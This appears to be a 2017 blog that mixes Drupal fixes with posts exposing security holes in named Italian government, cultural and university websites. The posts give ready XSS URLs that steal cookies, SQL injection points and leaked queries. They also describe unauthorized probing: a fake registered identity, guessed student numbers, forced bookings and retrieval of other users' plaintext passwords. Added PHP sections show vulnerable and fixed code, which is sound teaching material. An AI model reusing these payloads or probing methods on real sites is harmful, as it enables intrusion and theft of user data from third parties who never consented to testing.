Friday, 15 December 2017

[FIX] Drupal 7 - metatag unsupported operand


Run the following SQL command (e.g. from phpMyAdmin):

TRUNCATE cache_metatag;

Another possible approach is to clear all caches with drush from the command line:

$ drush cc all


On the Drupal website there's no answer to this problem, but the fix is quite simple.

Friday, 1 December 2017

Reggia di Caserta - SQL injection, system compromise, XSS, etc. | http://www.reggiadicaserta.beniculturali.it



Joomla 1.5.15 (Vulnerable)

http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also host malware (search the page source for http://www.freepokermoney.net or similar URLs):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page: http://archive.is/3JJsi


WordPress 4.8.3 (with bogus plugin and theme)

http://www.reggiadicaserta.beniculturali.it/wp/




The WordPress version is the "new" website, and they also "devastated" the already bad (malware-ridden) SEO optimization by not redirecting the old URLs. I feel very sorry for that. What a mess.



Monday, 27 November 2017

http://www.beneventocultura.it | XSS



XSS
http://www.beneventocultura.it/commento.php?Id=%3Cscript%3Ealert(document.cookie);%3C/script%3E

archived xss: http://archive.is/CwZMy

How to fix a Drupal installation with a 32-bit PHP version


Install Drupal on a server with a 32-bit version of PHP.

If you want to install Drupal on your TEST server even though you only have a 32-bit version of PHP, you need to edit:
core/modules/system/system.install

and comment out the following block (around line 973):


  if (PHP_INT_SIZE <= 4) {
    $requirements['limited_date_range'] = [
      'title' => t('Limited date range'),
      'value' => t('Your PHP installation has a limited date range.'),
      'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
      'severity' => REQUIREMENT_WARNING,
    ];
  }


It is strongly recommended to upgrade to a recent 64-bit version of PHP instead.

Thursday, 23 November 2017

unina.it | blind SQL injection, XSS, data leak, system compromise, etc.




http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]

archived error: http://archive.is/Zw3Ua
path: /home/httpd/elettrotecnica/grupponazionale/


XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E



SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7

Sample error archived: http://archive.is/2SO9a

select DATE_FORMAT(news_data, '%d/%m/%Y') as data ,news_periodo_desc,news_titolo,news_testo,news_allegato_1,news_allegato_2,tnews_id from tnews where news_id = 62


Joomla! with several vulnerabilities:
http://www.diarc.unina.it/
http://www.ceinge.unina.it
http://www.master-ris.unina.it/
http://www.sicc-it.unina.it

___
http://www.concorsi.unina.it/
Passwords are stored in plain text (not hashed) and can be retrieved for all the registered users.

Anybody can register and manipulate other accounts.
(sample fake account)
Codice Fiscale: RDLRLF80A01D247M
Password: RVENDOMIEU
Nome: radolfo
Cognome: radolfo
Data di Nascita: 1/01/1980
http://www.concorsi.unina.it/dottric/iscrizione/insertUser.jsp

http://www.concorsi.unina.it/dottric/IdentificazioneAmm.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Elenco.jsp
http://www.concorsi.unina.it/dottric/Amministrazione/recuperaPwd.jsp
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT131
http://www.concorsi.unina.it/dottric/visualizzazione/Dettagli.jsp?bando=DOTT111
http://www.concorsi.unina.it/dottric/visualizzazione/DettagliLingue.jsp?bando=DOTT131


__
http://www.sba.unina.it
Uses the Glizy framework.
The framework is outdated: http://www.minervaeurope.org/structure/workinggroups/userneeds/prototipo/cms/download.html

/admin/index.php
MW/config/config.xml <--- this is where the configuration data can be found

______
http://www.medicinacds.unina.it
I used the previously registered RDLRLF80A01D247M and, as suggested by the errors (M3900XXXX), a random "matricola" number, M39001234
Anno: 6
Nome:    radolfo
Cognome:     radolfo


We can also force the booking/"prenotazione" by choosing a different value for "scelta".
sample: http://www.medicinacds.unina.it/ade/rec_scheda.php?scelta=563

When submitting data we can subscribe/book other people, modify the submitted "matricola", get the user data (including password).


There's no need for an authorization/login to check the calendar
http://www.medicinacds.unina.it/ade/ade_calendarioperanno.php
archived: http://archive.is/9ws87



Several other problems on tomcat, outdated stuff and so on. Quite boring...
Note: I haven't modified any record or dumped/saved any confidential information.

Tuesday, 21 November 2017

http://mariorossi.it/ | XSS


http://mariorossi.it/categoria.cfm?cat=15&findcateg=%3Cscript%3Ealert(document.cookie);%3C/script%3E
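The three reflected XSS reports above (commento.php?Id=, ediz_precedenti.php?ediz= and categoria.cfm?findcateg=) all echo a query parameter into the page unescaped. As an added illustration, not code from any of those sites, here is a minimal PHP handler showing that defect next to the corrected form: validate parameters that have a known shape, and HTML-encode everything that is echoed.

```php
<?php
// Added example (not code from any of the sites listed above): a handler that
// reflects a query parameter into HTML. The first function reproduces the defect
// behind the ?Id=<script>... reports; the second shows the corrected handling.
declare(strict_types=1);

// VULNERABLE: the raw value is concatenated into the markup, so a value such as
// "<script>alert(document.cookie);</script>" is sent to the browser as a script.
function render_comment_vulnerable(array $get): string
{
    $id = $get['Id'] ?? '';
    return '<h2>Commento ' . $id . '</h2>';
}

// FIXED: (1) validate the parameter against the shape it must have, and
// (2) HTML-encode everything echoed into the page; ENT_QUOTES covers attribute
// context as well, ENT_SUBSTITUTE avoids an empty string on bad UTF-8.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_comment_fixed(array $get): string
{
    $raw = (string) ($get['Id'] ?? '');
    if (!preg_match('/^\d{1,10}$/', $raw)) {         // Id is a numeric key; reject anything else
        http_response_code(400);
        return '<h2>Commento non valido</h2>';
    }
    return '<h2>Commento ' . html($raw) . '</h2>';
}

// Free-text parameters (a search term such as findcateg=) cannot be validated
// that strictly, so output encoding is the control that must never be skipped.
function render_search_fixed(string $term): string
{
    return '<p>Risultati per: <b>' . html($term) . '</b></p>';
}

// Constructed probe mirroring the payload shape in the reports above.
$probe = ['Id' => '<script>alert(document.cookie);</script>'];
echo render_comment_vulnerable($probe), "\n";   // <script> tag reaches the browser intact
echo render_comment_fixed($probe), "\n";        // 400 and a neutral message
echo render_search_fixed($probe['Id']), "\n";   // &lt;script&gt;... rendered as harmless text
```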

Friday, 17 November 2017

sefsas.it | SQL injection



SQL injection in the email confirmation URL (there are several others):

http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]

e.g.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf

Full query sample in the output:

http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

archived: http://archive.is/xDVeh
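Both leaked queries on this page (the filclass tnews SELECT with news_id, and the sefsas CUSTOMERS SELECT with IDCUSTOMER and REMIP) come from the same mistake: the request parameter is pasted into the SQL string. As an added example, not code from either site, the PHP script below shows that pattern beside the parameterised fix; it uses an in-memory SQLite table with the filclass table and column names so it runs stand-alone.

```php
<?php
// Added example (not code from filclass.unina.it or bandi.sefsas.it): the
// string-building pattern behind the leaked SELECTs above, beside the
// parameterised fix. An in-memory SQLite table stands in for the real
// database so the script runs stand-alone; names follow the filclass query.
declare(strict_types=1);

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, // log errors; never print them to visitors
    ]);
    $db->exec('CREATE TABLE tnews (news_id INTEGER PRIMARY KEY, news_titolo TEXT, news_testo TEXT)');
    $db->exec("INSERT INTO tnews VALUES (62, 'Constructed title', 'Constructed body')");
    return $db;
}

// VULNERABLE: news_id is pasted into the SQL text, so the parameter is parsed
// as SQL. This is also why an error page can print the whole query back.
function fetch_news_vulnerable(PDO $db, string $newsId): ?array
{
    $sql = 'SELECT news_id, news_titolo, news_testo FROM tnews WHERE news_id = ' . $newsId;
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// FIXED: validate the type, then bind the value, so the database never sees
// user input as part of the statement. The same two steps fix the
// IDCUSTOMER / REMIP lookup shown in the actmail.asp output.
function fetch_news_fixed(PDO $db, string $newsId): ?array
{
    if (filter_var($newsId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        return null;                                 // not a positive integer: refuse, do not guess
    }
    $stmt = $db->prepare('SELECT news_id, news_titolo, news_testo FROM tnews WHERE news_id = :id');
    $stmt->execute([':id' => (int) $newsId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = make_db();
$probe = '0 OR 1=1';                                 // constructed input: no id 0, but the OR is always true
var_dump(fetch_news_vulnerable($db, $probe) !== null); // bool(true): the id-62 row comes back anyway
var_dump(fetch_news_fixed($db, $probe));             // NULL: rejected before any query runs
var_dump(fetch_news_fixed($db, '62')['news_titolo']); // string(17) "Constructed title"
```

On MySQL the same code applies; additionally set PDO::ATTR_EMULATE_PREPARES to false so the binding is done by the server rather than by client-side escaping.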